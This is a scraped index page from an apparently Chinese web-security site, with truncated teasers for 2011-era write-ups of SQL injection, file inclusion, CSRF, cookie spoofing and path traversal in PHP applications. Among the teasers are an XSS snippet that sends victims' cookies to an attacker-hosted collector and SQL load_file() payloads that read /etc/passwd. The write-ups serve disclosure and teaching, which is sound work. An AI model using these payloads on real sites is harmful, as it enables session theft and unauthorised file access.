Android 'content://' URI多个信息泄露 - 网站安关注热度:56

?php/** Description: Android #39;content://#39; URI Multiple Information Disclosure Vulnerabilities* Bugtraq ID: 48256* CVE: CVE-2010-4804* Affected: Android 2.3.4* Author: .....[详情]

优酷网CSRF致无限制顶或者踩一个视频及修复 - 网关注热度:11

简要描述：允许用户无限制的将一个视频置顶，或者置底详细说明：无限制顶或者踩一个视频漏洞证明：http://v.youku.com/v_show/id_XMzE1ODYzOTEy.html先查看当前的顶和踩的票数，再访问以下的链..[详情]

行业之星0.87 vote.php注入及修复 - 网站安全 - 自学关注热度:12

Team:t00ls Author: Cond0r代码。vote.php if($_REQUEST[#39;op#39;] == #39;poll#39;) { if($_POST[#39;op#39;] $_POST[#39;vtid#39;]) //得Post提交上去 { /* 判断是否已经投过票24 .....[详情]

网上在线挂号预约管理系统 v2.0 本地包含及修复关注热度:13

Team:t00ls Author: 风之传说看到各位大牛为了为了版主拼命挖洞，不知不觉带动了偶熄灭已久的基情。在网上查了下，貌似没有这个程序的漏洞信息，就发出来交流学习，反正偶也要洞木有..[详情]

虐神百度小偷v1.0 cookie欺骗及修复 - 网站安全 -关注热度:13

Team:t00ls Author: wming79虐神百度小偷v1.0 cookie欺骗本想发布歪酷CMS漏洞怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!此洞有点2... 毕竟是洞~ 让作者知道下也好.?phpif..[详情]

蓝海豚团购导航 V4.0.4本地包含及修复 - 网站安全关注热度:15

Team:t00ls Author: Cond0r代码代码PS:之前那个商城导航都进行了过滤 这个团购导航竟然木过滤。。我了个去（受GPC..）index.phpif(!empty($_REQUEST[#39;pluginid#39;])){ $pfile=ROOT_PATH.#39;/plugins.....[详情]

蓝海豚商城导航注入及修复 - 网站安全 - 自学p关注热度:12

Team:t00ls Author: Cond0r看代码Index.class.php若干function search_action() { $keyword = $_REQUEST[#39;keyword#39;]; if(empty($keyword)) { exit; }若干 if($_REQUEST[#3.....[详情]

Php安全新闻早8点（2011-11-28 星期一） - 网站安全关注热度:12

//2011-11-28 星期一//程序员思想：www.2cto.com?session_start();$admin = $_POST[#39;admin#39;];$pass = md5($_POST[#39;pass#39;]);$codes = $_POST[#39;codes#39;];if($_GET[#39;action#39.....[详情]

新浪3G网站路径遍历及修复 - 网站安全 - 自学ph关注热度:19

简要描述：对提交的变量没有作安全过滤和可读取文件目录作严格的控制，导致可以读取系统上任意文件，因为是php架构，可能同时导致其它严重问题。详细说明：漏洞证明：http://3g...[详情]

基于发起源判断CSRF攻击的方法 - 网站安全 - 自学关注热度:13

当我们要利用一个CSRF漏洞去攻击的时候，常会在第三方站点使用资源请求的方式加载存在漏洞的CSRF接口，当用户访问这个页面的时候就会偷偷的发送http request到漏洞站点，即攻击成功。..[详情]

要哇导航网建站系统 v3.2 注入漏洞及修复 - 网站关注热度:16

Team:t00ls Author: Cond0r随便打开一个代码文件就发现了。。看代码省略若干代码public function index() { //读取数据库判断 $type = M(#39;type#39;); $list = $type-where(#39;type.....[详情]

歪酷CMS v1.0 注入漏洞及修复 - 网站安全 - 自学p关注热度:10

Team:t00ls Author: Cond0r随便打开一个代码文件就发现了。。看代码省略若干代码public function index() { //读取数据库判断 $type = M(#39;type#39;); $list = $type-where(#39;type.....[详情]

Php安全新闻早8点（2011-11-27 星期日） - 网站安全关注热度:22

//2011-11-27 星期日//正则实战（2）：Preg_match验证URL$subscr=$_REQUEST[#39;subscr#39;];//url validationif (preg_match(#39;|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i#39;, $sub.....[详情]

利用XSS转存Cookie - 网站安全 - 自学php关注热度:14

利用XSS转存cookie:插入XSS语句scriptdocument.write(#39;img src= width=0 height=0 border=0 /#39;);/script其中Cookies.asp为文件,website为网址.我们需要将asp文件放入一个可访问的网站中.当.....[详情]

基于PHP+MySQL渗透测试中load_file()函数淫荡用法 -关注热度:11

1、replace(load_file(0times;2F6574632F706173737764),0times;3c,0times;20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件里完全显示.....[详情]